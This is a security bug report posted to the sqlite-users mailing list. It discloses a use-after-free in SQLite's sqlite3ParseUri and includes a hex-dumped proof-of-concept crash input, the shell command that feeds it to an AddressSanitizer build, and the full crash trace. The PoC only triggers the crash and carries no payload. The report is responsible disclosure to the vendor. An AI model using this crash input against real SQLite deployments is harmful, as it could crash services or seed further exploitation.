[sqlite] bug report (2/2) [security]

Jonathan Brossard Sat, 28 May 2016 03:14:40 -0700

Dear Sqlite team,

Please find attached a second bug report for a use after free() in sqlite.


Kindest regards,

j-

---------------------------------------------------------------------------
*                                                                         *
*                  Sqlite3 use after free vulnerability                   *
*                                                                         *
---------------------------------------------------------------------------

--[ Vulnerability summary:

    Date reported to vendor: 27 May 2016
    CVE : Not yet
    Class: Use after free()

--[ Synopsis:

    A heap overflow has been identified in sqlite3.
    Version tested : 3.8.9 2015-03-23 21:32:50 
0ee2d38deb35aefc55395e86984a9a773caf6218

--[ Vulnerability details:

    The sqlite3ParseUri() function is subject to a use after free() 
vulnerability.

--[ Exploitability:

     The vulnerability can consistently be triggered using the PoC reproduced 
below.
     Successfull exploitation is heap allocator dependant.

--[ Timeline:

    27 May 2016 : Vulnerability reported to vendor.


--[ PoC:

jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc2.txt
0000000: 2e20 6f70 204a 3378 147b 2929 2970 204a  . op J3x.{)))p J
0000010: 3378 147b 2929 290a 0a0a 0a0a 0a0a 0a0a  3x.{))).........
0000020: 0a0a 0a0a 0a0a 0a0a 3b0a 2e20 6f70 200a  ........;.. op .
0000030: 0a0a 0a0a 0a0a 0a0a 0a0a 0a0a 0a3b 0a2e  .............;..
0000040: 206f 7020 0a0a f60a 0a0a 0a0a 0a0a 0a0a   op ............
0000050: 0a0a 0a0a 0a3b 0a2e 206f 7020 2f20 529a  .....;.. op / R.
0000060: 293b 7020 2f20 529a 293b 206f 7420 2f3b  );p / R.); ot /;
0000070: 272e 106f 7020 7814 7b00 1018 0a2e 206f  '..op x.{..... o
0000080: 7020 2f20 4d9a                           p / M.
jbrossard@jbrossard-wsl3:~$ 


Note: You might need to compiled with a memory allocator monitor such as 
address sanitizer
or run the application after setting the MALLOC_CHECK environment variable in 
order to
catch this vulnerability.


jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ 
../../sqlite3/bin/sqlite3_afl32_asan < /tmp/poc1/poc2.txt 
=================================================================
==19089==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5600550 at 
pc 0x82c3389 bp 0xffcb3618 sp 0xffcb360c
READ of size 1 at 0xf5600550 thread T0
    #0 0x82c3388 in sqlite3Strlen30 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:23459
    #1 0x82c3388 in sqlite3ParseUri 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:129866
    #2 0x83e4117 in openDatabase 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:130235
    #3 0x806c9fe in open_db 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:1910
    #4 0x8092940 in open_db 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3249
    #5 0x8092940 in do_meta_command 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3254
    #6 0x80967a8 in process_input 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #7 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #8 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
    #9 0x8065148 
(/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)

0xf5600550 is located 0 bytes inside of 16-byte region [0xf5600550,0xf5600560)
freed by thread T0 here:
    #0 0xf72d61c4 in __interceptor_free 
../../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x80b9d1c in sqlite3_free 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20942
    #2 0x809288b in do_meta_command 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3257
    #3 0x80967a8 in process_input 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #5 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

previously allocated by thread T0 here:
    #0 0xf72d63e4 in __interceptor_malloc 
../../../../../libsanitizer/asan/asan_malloc_linux.cc:72
    #1 0x821a3c2 in sqlite3MemMalloc 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:17064
    #2 0x810490b in mallocWithAlarm 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20733
    #3 0x810490b in sqlite3Malloc 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20764
    #4 0x81901d6 in sqlite3StrAccumFinish 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22122
    #5 0x82c082c in sqlite3_vmprintf 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22233
    #6 0x82c082c in sqlite3_mprintf 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22248
    #7 0x80926e8 in do_meta_command 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3252
    #8 0x80967a8 in process_input 
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #9 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #10 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

SUMMARY: AddressSanitizer: heap-use-after-free 
/home/jbrossard/lab/sqlite3/build/sqlite3.c:23459 sqlite3Strlen30
Shadow bytes around the buggy address:
  0x3eac0050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3eac0060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3eac0070: fa fa fa fa fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x3eac0080: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x3eac0090: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
=>0x3eac00a0: fa fa fd fd fa fa fd fd fa fa[fd]fd fa fa fd fd
  0x3eac00b0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
  0x3eac00c0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
  0x3eac00d0: fa fa 00 00 fa fa 00 04 fa fa 00 fa fa fa 00 00
  0x3eac00e0: fa fa 00 04 fa fa 00 fa fa fa 00 00 fa fa 00 04
  0x3eac00f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==19089==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$

_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] bug report (2/2) [security]

Reply via email to